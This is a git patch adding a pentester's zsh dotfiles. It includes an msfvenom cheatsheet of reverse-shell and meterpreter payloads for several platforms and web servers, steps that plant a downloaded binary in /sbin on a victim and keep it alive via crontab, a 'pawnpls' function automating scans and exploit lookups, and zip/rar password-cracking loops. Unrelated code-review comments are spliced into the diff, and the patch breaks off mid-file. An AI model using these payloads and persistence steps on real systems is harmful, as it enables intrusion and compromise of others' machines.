From 0fd2b3df2fdd49c09951f2c0c1d0663547296b85 Mon Sep 17 00:00:00 2001 
From: user Date: Thu, 12 Jan 2017 20:41:16 +0100 Subject: [PATCH] anti-chaos update, test version --- .README.md.un~ | Bin 0 -> 2618 bytes LICENSE | 0 README.md | 42 ++++ README.md~ | 43 ++++ profile_files/.nanorc | 6 + .../v3das/metasploit_msfvenom_cheatsheet.txt | 126 +++++++++++ .../.ptz/v3das/network_sniffing_wireshark.txt | 37 ++++ profile_files/.vimrc | 4 + profile_files/.zsh/.pentest_functions.zsh.swp | Bin 0 -> 20480 bytes profile_files/.zsh/agro_detection_parser.py | 10 + profile_files/.zsh/aliases.zsh | 2 + profile_files/.zsh/bindkeys.zsh | 13 ++ profile_files/.zsh/colors.zsh | 17 ++ profile_files/.zsh/completion.zsh | 2 + profile_files/.zsh/general_functions.zsh | 22 ++ profile_files/.zsh/history.zsh | 1 + profile_files/.zsh/pentest_functions.zsh | 200 ++++++++++++++++++ profile_files/.zsh/prompt.zsh | 37 ++++ profile_files/.zsh/setopt.zsh | 4 + profile_files/.zshrc | 14 ++ 20 files changed, 580 insertions(+) create mode 100755 .README.md.un~ mode change 100644 => 100755 LICENSE mode change 100644 => 100755 README.md create mode 100755 README.md~ create mode 100644 profile_files/.nanorc create mode 100644 profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt create mode 100644 profile_files/.ptz/v3das/network_sniffing_wireshark.txt create mode 100644 profile_files/.vimrc create mode 100644 profile_files/.zsh/.pentest_functions.zsh.swp create mode 100644 profile_files/.zsh/agro_detection_parser.py create mode 100644 profile_files/.zsh/aliases.zsh create mode 100644 profile_files/.zsh/bindkeys.zsh create mode 100644 profile_files/.zsh/colors.zsh create mode 100644 profile_files/.zsh/completion.zsh create mode 100644 profile_files/.zsh/general_functions.zsh create mode 100644 profile_files/.zsh/history.zsh create mode 100644 profile_files/.zsh/pentest_functions.zsh create mode 100644 profile_files/.zsh/prompt.zsh create mode 100644 profile_files/.zsh/setopt.zsh create mode 100644 profile_files/.zshrc 
diff --git a/.README.md.un~ b/.README.md.un~ new file mode 100755 index 0000000000000000000000000000000000000000..2827690fe8e010b009773dbc706a1397a57935ec GIT binary patch literal 2618 zcmWH`%$*;a=aT=FfyvU)L|(ouJ7(Y1kX<&B)+^r}4Y%ypaR6L*@m&0m>;fk7LH zJrt0DYeiyiK~AbdT7Hp2ZfQULbY{Vn!fl1!52Y(J;&qQGRM zqksk>0E~`0aC9&*e3by2&ke+&I0U5&P*hkVB@G4Sv{9Uymkv)ENC^X$8VpSv!SM?+ zgc*oo02J4-L^2w`uu!2H4UFH($nguxT6{nZi(jhceQ0!pqL&59H=w8oMYjn^Y&1KA zLV*GRiaiIYeh}LL$}WSkfzdr1Uv!(|%Fg(TdL?Mwg5nZZrh_a7#WN^wT|k`CxCMm* z1%Q~iU5PJly~v5%JcGQ{3PZi*{9FYv(+I?bML2Rs2KfvW`Jf251aU?q925!^0AeD1 Z4LHIXA$2oI19I8zO^pcGg~j;uRRDax#9sga literal 0 HcmV?d00001 diff --git a/LICENSE b/LICENSE old mode 100644 new mode 100755 diff --git a/README.md b/README.md old mode 100644 new mode 100755 index 447769d..7e6fcef --- a/README.md +++ b/README.md @@ -1 +1,43 @@ Penetration Tester's Zsh - functions 4 fast pawn + +Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. + +Installing after you have the dependencies: cp profile_files/.* -R ~/ + + +Functions +========= + +pawnpls - Automatically enumerate and start predefined attacks such as brute force. + Example for single target: autopawn n0nexi-stent.com + Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com" + + +everythingworksornot\? - check if everything works or not for this script + + +chk functions +============= + +chkhttpz - HTTP response check + Example: chkhttpz itsec.lu 443 + +chkcrt - SSL certificate dump + Example: chkcrt gentoo.org 443 + + +cracking functions +================== + +johnzip - Crack zip files using john + Example: johnzip data.zip rockyou.txt + +johnrar - Crack rar files using john + Example: johnrar data.rar rockyou.txt + + +help functions +============== + +hlp - Get help of the hlp command +hlprnd - Get random strings (lengths: 8,16,32,64) diff --git a/README.md~ b/README.md~ new file mode 100755 index 0000000..65aaaac --- /dev/null +++ b/README.md~ 
@@ -0,0 +1,43 @@ +Penetration Tester's Zsh - functions 4 fast pawn + +Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. + +Installing after you have the dependencies: cp profile_files/.* -R ~/ + + +Functions +========= + +pawnpls - Automatically enumerate and start predefined attacks such as brute force. + Example for single target: autopawn 127.0.0.1 + Example for multiple targets: autopawn "127.0.0.1 127.0.0.2" + + +everythingworksornot\? - check if everything works or not for this script + + +chk functions +============= + +chkhttpz - HTTP response check + Example: chkhttpz itsec.lu 443 + +chkcrt - SSL certificate dump + Example: chkcrt gentoo.org 443 + + +cracking functions +================== + +johnzip - Crack zip files using john + Example: johnzip data.zip rockyou.txt + +johnrar - Crack rar files using john + Example: johnrar data.rar rockyou.txt + + +help functions +============== + +hlp - Get help of the hlp command +hlprnd - Get random strings (lengths: 8,16,32,64) diff --git a/profile_files/.nanorc b/profile_files/.nanorc new file mode 100644 index 0000000..be95edc --- /dev/null +++ b/profile_files/.nanorc @@ -0,0 +1,6 @@ +set linenumbers +set brackets ""')>]}" +set matchbrackets "(<[{)>]}" +set nohelp +set mouse +set smooth diff --git a/profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt b/profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt new file mode 100644 index 0000000..95c6d72 --- /dev/null +++ b/profile_files/.ptz/v3das/metasploit_msfvenom_cheatsheet.txt 
@@ -0,0 +1,126 @@ +C0nn3ctz msfvenom payload backdoor veil + +List payloads +msfvenom -l + +# The script way to make life more simple +theip=0.0.0.0 +theport=443 + + +Binaries and libs +================= + +Linux +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf +msfvenom -p linux/x64/shell/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf + +Windows +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe +msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf +msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED +msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll +msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll +msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport + +Mac +msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f macho > shell.macho + + + +Web Payloads +============ + +PHP +msfvenom -p php/meterpreter_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.php +cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php + +ASP +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f asp > shell.asp + +JSP +msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.jsp + +WAR +msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f war > shell.war + +JavaScript +msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1 -f js_le + + + +Scripting Payloads +================== + +Python +msfvenom -p cmd/unix/reverse_python LHOST=$theip LPORT=$theport -f raw > shell.py + +Bash +msfvenom -p cmd/unix/reverse_bash LHOST=$theip LPORT=$theport -f raw > shell.sh + +Perl +msfvenom -p cmd/unix/reverse_perl LHOST=$theip LPORT=$theport -f raw > shell.pl # For Linux +msfvenom -p 
cmd/windows/reverse_perl=$theip LPORT=$theport -f raw > shell.pl # For Windows + + + +Shellcode +========= + +For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. + +Linux Based Shellcode +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f + +Windows Based Shellcode +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f +msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=443 -f c +msfvenom -p windows/shell/bind_tcp -f perl --smallest # Default port is 4444 and with --smallest msfvenom tries to make it small + +Mac Based Shellcode +msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f + + + +Handler +======= + +Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. + +use exploit/multi/handler +set PAYLOAD cmd/windows/powershell_reverse_tcp +set LHOST 0.0.0.0 +set LPORT 443 +set ExitOnSession false +exploit -j -z + +Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ + + + +Persistence +=========== +meterpreter > run persistence + + + +UUID Payload +============ + +# Create payload +msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=domainzz.com  LPORT=53 PayloadUUIDTracking=true PayloadUUIDName=HAXHAXHAXHAX -f elf > hipchat + +# Setup msf listener +set payload linux/x86/meterpreter/reverse_tcp_uuid +set payloadUUIDName HAXHAXHAXHAX +set PayloadUUIDTracking true +run -j  + +# Move to vict +cat hipchat.elf |ncat --ssl -lvp 53 +nc --ssl domainzz.com 53 > /sbin/lister +chmod +x /sbin/lister + +# crontab alternatively: +if ps aux|grep /sbin/hipchat |grep -v grep; then sleep 1 ; else /sbin/hipchat ; fi + 
diff --git a/profile_files/.ptz/v3das/network_sniffing_wireshark.txt b/profile_files/.ptz/v3das/network_sniffing_wireshark.txt new file mode 100644 index 0000000..006832d --- /dev/null +++ b/profile_files/.ptz/v3das/network_sniffing_wireshark.txt @@ -0,0 +1,37 @@ +C0nn3ctz sniffing wireshark network + +IP address +ip.addr == 192.168.1.1 +ip.src == 192.168.1.1 +ip.dst == 192.168.1.1 + +Show only tcp port 110 +tcp.port eq 110 + +Show only tcp and udp port 110 +tcp.port eq 110 || udp.port eq 110 + +Follow TCP stream +tcp.stream eq 0 + +Show only TCP +tcp + +Show only ARP +arp + +Show only HTTP +http + +Show only HTTP or ARP +http||arp + + +HTTP and ip.src +http&&ip.src==192.168.1.4 + +HTTP POST +http:.request.method == "POST" + +etc +(ip.addr==192.168.1.0/24) and (ip.src!=192.168.1.2)and (ip.dst!=192.168.1.4) diff --git a/profile_files/.vimrc b/profile_files/.vimrc new file mode 100644 index 0000000..afdae4e --- /dev/null +++ b/profile_files/.vimrc @@ -0,0 +1,4 @@ +syntax on +set nu +set backspace=indent,eol,start +set tabstop=4 shiftwidth=4 expandtab 
diff --git a/profile_files/.zsh/.pentest_functions.zsh.swp b/profile_files/.zsh/.pentest_functions.zsh.swp new file mode 100644 index 0000000000000000000000000000000000000000..a5402f9c84f40fc25812d424db8a1cd9d1d80f2a GIT binary patch literal 20480 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 literal 0 HcmV?d00001 diff --git a/profile_files/.zsh/agro_detection_parser.py b/profile_files/.zsh/agro_detection_parser.py new file mode 100644 index 0000000..021424d --- /dev/null 
+++ b/profile_files/.zsh/agro_detection_parser.py @@ -0,0 +1,10 @@ +#!/usr/bin/python2.7 + +with open('2_ports_and_service_top1000_on_alive_hosts.out') as f: + curip="" + for curline in f: + if "Nmap scan report for " in curline: + curip=curline + curip=curip[21:] + if "open" in curline: + print curip.strip('\n') + " " + curline.strip('\n') diff --git a/profile_files/.zsh/aliases.zsh b/profile_files/.zsh/aliases.zsh new file mode 100644 index 0000000..a0dd0e2 --- /dev/null +++ b/profile_files/.zsh/aliases.zsh @@ -0,0 +1,2 @@ +alias py='python' +alias pl='perl' diff --git a/profile_files/.zsh/bindkeys.zsh b/profile_files/.zsh/bindkeys.zsh new file mode 100644 index 0000000..3069983 --- /dev/null +++ b/profile_files/.zsh/bindkeys.zsh @@ -0,0 +1,13 @@ +bindkey "^K" kill-whole-line + +bindkey "${terminfo[khome]}" beginning-of-line +bindkey "${terminfo[kend]}" end-of-line +bindkey "\e[3~" delete-char + +bindkey -v +bindkey '^R' history-incremental-search-backward +bindkey '^T' history-incremental-search-backward + +# Jumping with ctrl+arrows +bindkey "^[[1;5C" forward-word +bindkey "^[[1;5D" backward-word diff --git a/profile_files/.zsh/colors.zsh b/profile_files/.zsh/colors.zsh new file mode 100644 index 0000000..8267050 --- /dev/null +++ b/profile_files/.zsh/colors.zsh @@ -0,0 +1,17 @@ +autoload colors; colors + +# The variables are wrapped in %{%}. This should be the case for every variable that does not contain space. +for COLOR in RED GREEN YELLOW BLUE MAGENTA CYAN BLACK WHITE; do + eval PR_$COLOR='%{$fg_no_bold[${(L)COLOR}]%}' + eval PR_BOLD_$COLOR='%{$fg_bold[${(L)COLOR}]%}' +done + +eval RESET='$reset_color' +export PR_RED PR_GREEN PR_YELLOW PR_BLUE PR_WHITE PR_BLACK +export PR_BOLD_RED PR_BOLD_GREEN PR_BOLD_YELLOW PR_BOLD_BLUE +export PR_BOLD_WHITE PR_BOLD_BLACK + +# Clear LSCOLORS +unset LSCOLORS +export CLICOLOR=1 +export LS_COLORS=exfxcxdxbxegedabagacad 
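Review bot: The `if "open" in curline` test in the loop is a substring match, so it also fires on `open|filtered` rows and on any service or banner text that happens to contain the word, and those rows then flow into `3_ip_port_service.out` in scan_enum_tof. Checking the state column is more precise: `fields = curline.split()` followed by `if len(fields) >= 2 and fields[1] == "open":`. The input filename is hard-coded relative to the current directory, so the script only works when run from the scan folder; reading it from `sys.argv[1]` with the current name as default would make that dependency explicit. The `print` statement pins the file to Python 2, which the `#!/usr/bin/python2.7` shebang matches but the bare `python ~/.zsh/agro_detection_parser.py` call in pentest_functions.zsh does not guarantee.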
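Review bot: The first five `bindkey` calls run before `bindkey -v`, so they land in the emacs keymap that is active at that point, and switching the main keymap to viins on the `bindkey -v` line appears to discard them (^K, Home, End and Delete would then not work); moving `bindkey -v` to the top of the file fixes the order. `bindkey '^T' history-incremental-search-backward` duplicates the `^R` binding on the line above; if a forward search was meant, the widget is `history-incremental-search-forward`. A one-line comment stating that the file assumes vi mode would help the next reader.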
diff --git a/profile_files/.zsh/completion.zsh b/profile_files/.zsh/completion.zsh new file mode 100644 index 0000000..6fe6d5f --- /dev/null +++ b/profile_files/.zsh/completion.zsh @@ -0,0 +1,2 @@ +autoload -U compinit && compinit +zmodload -i zsh/complist diff --git a/profile_files/.zsh/general_functions.zsh b/profile_files/.zsh/general_functions.zsh new file mode 100644 index 0000000..febd4bd --- /dev/null +++ b/profile_files/.zsh/general_functions.zsh @@ -0,0 +1,22 @@ +function extract { + echo Running extract on $1 ... + if [ -f $1 ] ; then + case $1 in + *.tar.bz2) tar xjf $1 ;; + *.tar.gz) tar xzf $1 ;; + *.bz2) bunzip2 $1 ;; + *.rar) unrar x $1 ;; + *.gz) gunzip $1 ;; + *.tar) tar xf $1 ;; + *.tbz2) tar xjf $1 ;; + *.tgz) tar xzf $1 ;; + *.zip) unzip $1 ;; + *.Z) uncompress $1 ;; + *.7z) 7z x $1 ;; + *.xz) unxz $1 ;; + *) echo "'$1' cannot be extracted via extract()" ;; + esac + else + echo "'$1' is not a valid file" + fi +} diff --git a/profile_files/.zsh/history.zsh b/profile_files/.zsh/history.zsh new file mode 100644 index 0000000..1e38ca6 --- /dev/null +++ b/profile_files/.zsh/history.zsh @@ -0,0 +1 @@ +# Not saving history by default diff --git a/profile_files/.zsh/pentest_functions.zsh b/profile_files/.zsh/pentest_functions.zsh new file mode 100644 index 0000000..86f549d --- /dev/null +++ b/profile_files/.zsh/pentest_functions.zsh 
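Review bot: Both failure branches in extract (`*) echo "'$1' cannot be extracted …"` and `echo "'$1' is not a valid file"`) write to stdout and let the function return 0, so a caller such as `extract "$f" || …` cannot tell that nothing was extracted; print them with `>&2` and end each with `return 1`. Every `$1` is unquoted (`[ -f $1 ]`, `tar xjf $1`, `unzip $1`, …); zsh does not word-split unquoted parameters by default, but a file name beginning with `-` is still read as an option by tar/unzip/unrar, and the function breaks if it is ever reused under bash, so `"$1"` (with `--` where the tool accepts it) is the safer form. Calling extract with no argument also passes the one-operand test `[ -f ]`, which is true, and so reaches the `*)` branch with an empty name; a `[ -n "$1" ]` guard at the top avoids that.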
@@ -0,0 +1,200 @@ +function everythingworksornot"?" { + echo "really?" +} + +function ton { + . torsocks on +} + +function tof { + . torsocks off +} + + +function chkhttpz { + echo "HTTP responses" + wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/" + + echo "\nHTTPS responses" + wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/" +} + + +function chkcrt { + openssl s_client -showcerts -connect $1:$2 +} + + +function hlp { + echo "You can get help from the following topics:" + for f in ~/.ptz/v3das/* ; do + echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1 + done +} + +function hlprnd { + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-64};echo; +} + + +function johnzip { + if [ $# -ne 2 ] + then + echo "Usage $0 " + return + fi + + echo "Unzip test..." + unzip -l $1 + + echo "Cracking...." + for i in $(john --wordlist=$2 --rules --stdout) + do + echo -ne "\rtrying \"$i\" " + unzip -o -P $i $1 >/dev/null 2>&1 + STATUS=$? + if [ $STATUS -eq 0 ]; then + echo -e "\nArchive password is: \"$i\"" + return + fi + done +} + + +function johnrar { + if [ $# -ne 2 ] + then + echo "Usage $0 " + else + rar l $1 + echo "Cracking...." + john --wordlist=$2 --rules --stdout | while read i + do + echo -ne "\rtrying \"$i\" " + rar e -o+ -inul -p$i $1 >/dev/null + STATUS=$? + if [ $STATUS -eq "0" ]; then + echo -e "\nArchive password is: \"$i\"" + return + fi + done + fi +} + + + +function pawnpls { + amir00t=$(whoami) + if [ "$amir00t" != "root" ] + then + echo "pawnpls needs root in order to be effective (eg. for nmap -sS scans)." + return + fi + + if [ $# -ne 1 ] + then + echo "Are you sure? You need to specify a target. Be careful. 
This runs out of tor also, even if you have torsocks ;)" + return + fi + + # Pass to the scan function, no active attacks, just scanning + pawnpls_tof_target=$1 + dns_enum_tof + scan_enum_tof + active_attack_tof + +} + + +function dns_enum_tof { + + . torsocks off + + dnstarg=($pawnpls_tof_target) + + cdate=$(date +"%Y-%m-%d-%H%M") + dettmpfold="~/.ptz/result-scan-$cdate" + mkdir -p $sctmpfold + cd $sctmpfold + + theharvester -d $pawnpls_tof_target -b all -v > 1_harvester_$pawnpls_tof_target.txt + +} + +function scan_enum_tof { + + . torsocks off + + # Variables + targetx=($pawnpls_tof_target) # Space delimited! + ports=(21-23,25-26,53,80-81,110-111,113,135,139,143,179,199,443,445,465,514-515,548,554,587,646,993,995,1025-1027,1433,1720,1723,2000-2001,3306,3389,4443,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154,11211) + + # Initialize directory and naming structure + cdate=$(date +"%Y-%m-%d-%H%M") + sctmpfold="~/.ptz/result-scan-$cdate" + mkdir -p $sctmpfold + cd $sctmpfold + + touch scan_history.txt + + echo "---- Starting AgroScanner ----" >> scan_history.txt + + # Start with standard alive scan and check ports on alive hosts + # Get alive hosts + echo "Starting alive host enumeration..." + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting alive hosts scan." >> scan_history.txt + nmap --randomize-hosts -sn -PS$ports $targetx -oG 1_alive_hosts.out + alive_hosts=$(grep "Status: Up" 1_alive_hosts.out | cut -d' ' -f2 | tr '\r\n' ' ') + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished alive hosts scan. Found hosts: " $alive_hosts >> scan_history.txt + + echo "Starting port scans on alive hosts..." + # Port scanning on alive hosts and version detection + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting port scans on alive hosts with top 1000." 
>> scan_history.txt + nmap --randomize-hosts -sS -sV -n -Pn --top-ports 1000 $targetx > 2_ports_and_service_top1000_on_alive_hosts.out + python ~/.zsh/agro_detection_parser.py | sed -n '/ /s/ \+/ /gp' > 3_ip_port_service.out + number_open_tcp_ports=$(grep -v "Nmap scan report for" 3_ip_port_service.out |wc -l) # It lists all ports, even unknown and faster to grep from here for this. + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished port scans on alive hosts with top 1000. Number of open ports: " $number_open_tcp_ports >> scan_history.txt + # Run UDP scan on most common ports + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting UDP scans." >> scan_history.txt + nmap -sU --top-ports 50 $targetx > 4_udpscan.out + number_open_udp_ports=$(grep "open" 4_udpscan.out |wc -l) + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished UDP scans. Number of open UDP ports: " $number_open_udp_ports >> scan_history.txt + + echo "Starting nmap nse vulnerability scanning..." + # Vulnerability scanning + echo $(date +"%Y-%m-%d-%H-%M-%S") " Starting simple vulnerbility scans." >> scan_history.txt + nmap -n -p 21 --script=ftp-anon.nse $targetx > 5_nmap_script_ftpanon.txt + nmap -sU -sS --script smb-enum-* -p U:137,T:139 $targetx > 6_nmap_sbm_nse_scan.txt # There is issue with the * askterisk... should be escaped or something + nmap -sS -n -p $ports --script=default,safe,vuln $targetx > 7_nmap_script_default-safe-vuln_scan.txt + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished vulnerability scans. Lists are in the relevant txt files." >> scan_history.txt + + echo $(date +"%Y-%m-%d-%H-%M-%S") " Started scan for automatic searchsploit." >> scan_history.txt + # for searchsploit, but nmap should be configured to scan with xml, default is top 1000 + nmap -sS -sV -sC -O --host-timeout=5m --max-hostgroup=1 -Pn $targetx -oA 8_nmap_for_searchsploit + searchsploit -v --nmap 8_nmap_for_searchsploit.xml > 9_searchslpoit_results.txt + echo $(date +"%Y-%m-%d-%H-%M-%S") " Finished the searchsploit queries. 
Outputs are in the relevant files." >> scan_history.txt + +} + +function active_attack_tof { + + . torsocks off + + cdate=$(date +"%Y-%m-%d-%H%M") + aatmpfold="~/.ptz/result-attack-$cdate" + mkdir -p $aatmpfold + cd $aatmpfold + + + # Preconfs + hydrabruteprotocol=(cvs firebird icq irc ldap nntp oracle-listener oracle-sid pcanywhere pcnfs postgres rdp redis rtsp ssh sip teamspeak vmauthd) + usernames="/usr/share/nmap/nselib/data/usernames.lst" + passwords="/usr/share/nmap/nselib/data/passwords.lst" + + + + +} diff --git a/profile_files/.zsh/prompt.zsh b/profile_files/.zsh/prompt.zsh new file mode 100644 index 0000000..fc35679 --- /dev/null +++ b/profile_files/.zsh/prompt.zsh @@ -0,0 +1,37 @@ +function git_prompt_info { + local ref=$(=git symbolic-ref HEAD 2> /dev/null) + local gitst="$(=git status 2> /dev/null)" + + if [[ -f .git/MERGE_HEAD ]]; then + if [[ ${gitst} =~ "unmerged" ]]; then + gitstatus=" %{$fg[red]%}unmerged%{$reset_color%}" + else + gitstatus=" %{$fg[green]%}merged%{$reset_color%}" + fi + elif [[ ${gitst} =~ "Changes to be committed" ]]; then + gitstatus=" %{$fg[blue]%}!%{$reset_color%}" + elif [[ ${gitst} =~ "use \"git add" ]]; then + gitstatus=" %{$fg[red]%}!%{$reset_color%}" + elif [[ -n `git checkout HEAD 2> /dev/null | grep ahead` ]]; then + gitstatus=" %{$fg[yellow]%}*%{$reset_color%}" + else + gitstatus='' + fi + + if [[ -n $ref ]]; then + echo "%{$fg_bold[green]%}/${ref#refs/heads/}%{$reset_color%}$gitstatus" + fi +} + +function trso { + trsochk=$(/usr/bin/torsocks show|grep libtorsocks.so) + if [[ -z $(/usr/bin/torsocks show|grep libtorsocks.so) ]] + then + trchkres="%{$fg[yellow]%}tof" + else + trchkres="%{$fg[red]%}ton" + fi + echo $trchkres +} + +PROMPT='%{$fg[red]%}$(whoami)%{$reset_color%}.ptz $(trso)%{$reset_color%} %~%<< $(git_prompt_info) ${PR_BOLD_WHITE}>%{${reset_color}%} ' diff --git a/profile_files/.zsh/setopt.zsh b/profile_files/.zsh/setopt.zsh new file mode 100644 index 0000000..4b865a7 --- /dev/null 
